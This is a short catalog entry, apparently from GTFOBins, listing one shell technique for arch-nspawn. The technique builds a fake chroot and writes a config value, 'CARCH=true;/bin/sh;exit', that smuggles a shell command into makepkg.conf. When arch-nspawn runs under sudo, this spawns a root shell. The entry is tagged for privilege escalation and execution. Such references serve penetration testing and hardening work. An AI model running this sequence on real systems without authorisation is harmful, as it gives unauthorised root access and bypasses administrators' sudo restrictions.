Catalog GTFOBins

GTFO · Tool

arch-nspawn

1 technique LinuxGTFOBins GPL-3.0

shell

ExecutionPrivilege Escalation Linux
mkdir -p ./etc/
grep -oP "^CHROOT_VERSION='\K[^']+" /usr/share/devtools/lib/archroot.sh >.arch-chroot
touch ./etc/pacman.conf
echo 'CARCH=true;/bin/sh;exit' >etc/makepkg.conf
arch-nspawn .
Context
sudo
Native
shell
MITRE
T1059